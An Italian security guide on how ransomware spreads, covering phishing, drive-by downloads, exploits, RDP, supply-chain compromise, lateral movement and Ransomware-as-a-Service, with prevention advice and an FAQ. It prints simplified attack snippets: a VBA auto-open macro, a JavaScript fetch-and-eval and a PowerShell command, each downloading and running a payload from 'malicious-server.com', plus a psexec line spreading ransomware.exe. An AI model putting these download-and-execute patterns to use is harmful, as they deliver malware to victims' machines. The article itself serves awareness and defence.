Guide tecniche

Come si diffonde un ransomware

Scopri come si diffonde un ransomware, quali sono i vettori di attacco più usati e come proteggere sistemi, reti e dati aziendali.

email malevole

11 Maggio 2026

Indice dei contenuti

  • Come si diffonde un ransomware
  • Phishing e email malevole
  • Download da siti compromessi
  • Vulnerabilità software e exploit
  • Attacchi tramite Remote Desktop Protocol (RDP)
  • Compromissione della supply chain
  • Il modello Ransomware-as-a-Service
  • Strategie per prevenire la diffusione del ransomware

Negli ultimi anni il ransomware è diventato una delle minacce informatiche più pericolose per aziende, istituzioni e utenti privati. Questo tipo di malware è progettato per bloccare l’accesso ai dati o ai sistemi informatici di una vittima, richiedendo il pagamento di un riscatto per ripristinare l’accesso ai file.

Se fino a qualche anno fa gli attacchi ransomware erano relativamente semplici e limitati a campagne di spam via email, oggi le modalità di diffusione sono diventate molto più sofisticate. I cybercriminali utilizzano una combinazione di tecniche come phishing, vulnerabilità software, attacchi alla supply chain e compromissione delle credenziali per infiltrarsi nei sistemi informatici.

Comprendere come si diffonde un ransomware è quindi fondamentale per sviluppare strategie efficaci di difesa. In questo articolo analizzeremo in modo approfondito i principali metodi di propagazione del ransomware, con esempi concreti e indicazioni pratiche per migliorare la sicurezza informatica.

Come si diffonde un ransomware

La diffusione di un ransomware segue quasi sempre uno schema ben preciso. Gli attaccanti devono prima ottenere un punto di accesso all’interno di un sistema o di una rete aziendale. Una volta entrati, il malware viene installato e successivamente si attiva la fase di cifratura dei dati.

Il processo può essere suddiviso in diverse fasi principali:

  • Accesso iniziale
  • Escalation dei privilegi
  • Movimento laterale nella rete
  • Distribuzione del malware
  • Cifratura dei dati e richiesta di riscatto

Questa struttura riflette spesso le tecniche documentate nei framework di analisi delle minacce come MITRE ATT&CK.

Esempio
Un attacco ransomware può iniziare con una semplice email di phishing che convince un dipendente ad aprire un allegato. All’interno del file è nascosto un codice malevolo che installa un loader, il quale a sua volta scarica il ransomware vero e proprio.

Phishing e email malevole

Uno dei metodi più comuni con cui si diffonde un ransomware è attraverso campagne di phishing.

Gli attaccanti inviano email che sembrano provenire da fonti affidabili, come banche, fornitori o colleghi di lavoro. Questi messaggi contengono spesso allegati o link che portano al download di malware.

Un esempio tipico potrebbe essere un’email con oggetto:

“Fattura urgente – pagamento in sospeso”

L’allegato può essere un documento Word o Excel con macro dannose. Quando l’utente abilita le macro, viene eseguito uno script che scarica il ransomware da un server remoto.

Ecco un esempio semplificato di macro malevola utilizzata in molti attacchi:

Sub AutoOpen()

    Dim url As String

    url = "http://malicious-server.com/payload.exe"

    Dim filePath As String

    filePath = Environ("TEMP") & "\payload.exe"

    DownloadFile url, filePath

    Shell filePath

End Sub

Questo tipo di codice dimostra come un semplice documento possa diventare un veicolo per la distribuzione di malware.

Le campagne di phishing restano così efficaci perché sfruttano l’anello più debole della sicurezza informatica: il fattore umano.

Download da siti compromessi

Un altro metodo molto diffuso per la diffusione del ransomware è rappresentato dai siti web compromessi.

In questo caso gli attaccanti inseriscono codice malevolo all’interno di pagine web legittime. Quando un utente visita il sito, il codice tenta di sfruttare vulnerabilità del browser o dei plugin installati.

Questo tipo di attacco è noto come drive-by download.

Il processo funziona in questo modo:

  • l’utente visita un sito web compromesso
  • il browser esegue codice JavaScript malevolo
  • viene sfruttata una vulnerabilità del sistema
  • il ransomware viene scaricato e installato

Un esempio semplificato di codice JavaScript utilizzato in exploit kit potrebbe essere:

fetch("http://malicious-server.com/exploit")

.then(response => response.text())

.then(data => {

    eval(data);

});

Ovviamente gli exploit reali sono molto più complessi, ma questo esempio mostra come il codice remoto possa essere eseguito direttamente nel browser.

Vulnerabilità software e exploit

Molti attacchi ransomware sfruttano vulnerabilità nei sistemi operativi o nei software utilizzati dalle aziende.

Quando un software presenta una falla di sicurezza non corretta con una patch, gli attaccanti possono utilizzarla per ottenere accesso remoto al sistema.

Un caso famoso è stato l’attacco WannaCry, che sfruttava una vulnerabilità nel protocollo SMB di Windows.

Gli exploit permettono ai cybercriminali di eseguire codice sul sistema della vittima senza che l’utente debba compiere alcuna azione.

Ad esempio, un attacco può utilizzare uno script simile:

import socket

target = "192.168.1.10"

port = 445

payload = b"malicious_payload"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((target, port))

s.send(payload)

In un contesto reale il payload sarebbe molto più sofisticato e sfrutterebbe specifiche vulnerabilità del sistema operativo.

Leggi l’ approfondimento:  Ransomware: attacchi, rischi e contromisure

tentare attacchi

Attacchi tramite Remote Desktop Protocol (RDP)

Un’altra modalità molto comune di diffusione del ransomware è l’accesso non autorizzato ai server tramite Remote Desktop Protocol (RDP).

Molte aziende espongono servizi RDP direttamente su Internet per permettere ai dipendenti di accedere ai sistemi da remoto. Se le password sono deboli o non è attiva l’autenticazione a due fattori, gli attaccanti possono tentare attacchi di brute force per ottenere l’accesso.

Una volta entrati nel sistema, i cybercriminali possono installare manualmente il ransomware.

Questo metodo è particolarmente pericoloso perché permette agli attaccanti di:

  • esplorare la rete aziendale
  • disattivare sistemi di sicurezza
  • eliminare backup
  • distribuire il ransomware su più macchine

Molti gruppi ransomware utilizzano strumenti amministrativi legittimi come PowerShell per muoversi nella rete.

Un esempio di comando utilizzato per distribuire malware potrebbe essere:

Invoke-WebRequest -Uri “http://malicious-server.com/ransomware.exe” -OutFile “C:\temp\ransomware.exe”

Start-Process “C:\temp\ransomware.exe”

Compromissione della supply chain

Negli ultimi anni si è diffuso un nuovo tipo di attacco: la compromissione della software supply chain.

In questo scenario gli attaccanti infiltrano codice malevolo in software legittimi utilizzati da migliaia di aziende.

Quando il software viene aggiornato, il malware viene distribuito automaticamente a tutti gli utenti.

Uno dei casi più noti è stato l’attacco alla piattaforma SolarWinds.

Questo tipo di attacco è estremamente pericoloso perché sfrutta la fiducia degli utenti nei fornitori software.

Secondo il report del National Institute of Standards and Technology (NIST), la sicurezza della supply chain è oggi una delle priorità principali per la cyber security globale.

Diffusione laterale nella rete aziendale

Una volta entrato in un sistema, il ransomware non si limita a colpire un singolo computer.

Gli attaccanti cercano di diffondersi all’interno della rete aziendale per aumentare il danno e la probabilità di pagamento del riscatto.

Questo processo viene chiamato lateral movement.

Gli strumenti più utilizzati includono:

  • PsExec
  • PowerShell
  • credenziali rubate
  • exploit di rete

Esempio
Un attaccante potrebbe utilizzare PsExec per eseguire il ransomware su altri computer della rete:

psexec \\192.168.1.20 -u admin -p password ransomware.exe

In pochi minuti il malware può diffondersi a decine o centinaia di sistemi.

Il modello Ransomware-as-a-Service

Un fattore che ha accelerato la diffusione del ransomware è il modello criminale noto come Ransomware-as-a-Service (RaaS).

In questo modello gli sviluppatori del ransomware creano la piattaforma e la affittano ad altri criminali.

Gli affiliati si occupano di:

  • diffondere il malware
  • compromettere le reti
  • negoziare il pagamento del riscatto

In cambio, una percentuale del pagamento viene versata agli sviluppatori del ransomware.

Questo modello ha reso gli attacchi ransomware molto più frequenti, perché ha abbassato la barriera tecnica per entrare nel cybercrime.

Strategie per prevenire la diffusione del ransomware

Prevenire la diffusione del ransomware richiede una strategia multilivello che combini tecnologia, formazione e processi di sicurezza.

Tra le misure più efficaci troviamo:

  • aggiornamento costante dei software
  • backup offline dei dati
  • autenticazione multifattore
  • segmentazione della rete
  • formazione contro il phishing

Molte organizzazioni stanno adottando anche modelli di sicurezza basati su Zero Trust, che limitano l’accesso ai sistemi e riducono la possibilità di movimento laterale degli attaccanti.

La prevenzione resta la difesa più efficace, perché una volta che il ransomware ha cifrato i dati il recupero può essere estremamente difficile.

Conclusione

Capire come si diffonde un ransomware è fondamentale per sviluppare strategie di difesa efficaci.

Gli attacchi moderni non si limitano più a semplici email di phishing, ma combinano diverse tecniche come exploit software, compromissione della supply chain e accessi remoti non protetti.

La diffusione del ransomware è favorita anche da modelli criminali organizzati come il Ransomware-as-a-Service, che hanno trasformato il cybercrime in un vero ecosistema economico.

Per questo motivo le aziende devono adottare un approccio proattivo alla sicurezza informatica, investendo in prevenzione, formazione e monitoraggio continuo.

Solo comprendendo i meccanismi di diffusione delle minacce è possibile costruire sistemi più resilienti e ridurre il rischio di attacchi devastanti.

Domande e risposte

  1. Che cos’è un ransomware
    Un ransomware è un tipo di malware che blocca l’accesso ai dati o ai sistemi informatici e richiede il pagamento di un riscatto per ripristinare l’accesso.
  2. Qual è il metodo più comune di diffusione del ransomware
    Il metodo più comune è il phishing via email, che induce gli utenti ad aprire allegati o link malevoli.
  3. Il ransomware può diffondersi automaticamente nella rete
    Sì, molti ransomware includono funzionalità di movimento laterale che permettono al malware di propagarsi ad altri sistemi.
  4. Cos’è il modello Ransomware-as-a-Service
    È un modello criminale in cui gli sviluppatori affittano il ransomware ad affiliati che lo distribuiscono.
  5. Gli aggiornamenti software aiutano a prevenire il ransomware
    Sì, installare patch di sicurezza riduce il rischio che gli attaccanti sfruttino vulnerabilità note.
  6. È possibile recuperare i dati senza pagare il riscatto
    Dipende dal tipo di ransomware. In alcuni casi è possibile recuperare i dati tramite backup o strumenti di decrittazione.
  7. Il ransomware colpisce solo le aziende
    No, anche utenti privati possono essere vittime di attacchi ransomware.
  8. Gli antivirus possono fermare il ransomware
    Gli antivirus aiutano, ma da soli non sono sufficienti. Serve una strategia di sicurezza multilivello.
  9. Cos’è la diffusione tramite RDP
    Si verifica quando gli attaccanti accedono ai server tramite Remote Desktop sfruttando password deboli o vulnerabilità.
  10. Qual è la migliore difesa contro il ransomware
    La combinazione di backup sicuri, formazione degli utenti e sistemi di sicurezza aggiornati.
2
To top